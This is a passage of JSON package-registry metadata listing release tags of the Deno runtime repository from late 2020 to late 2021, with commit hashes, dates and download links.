185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36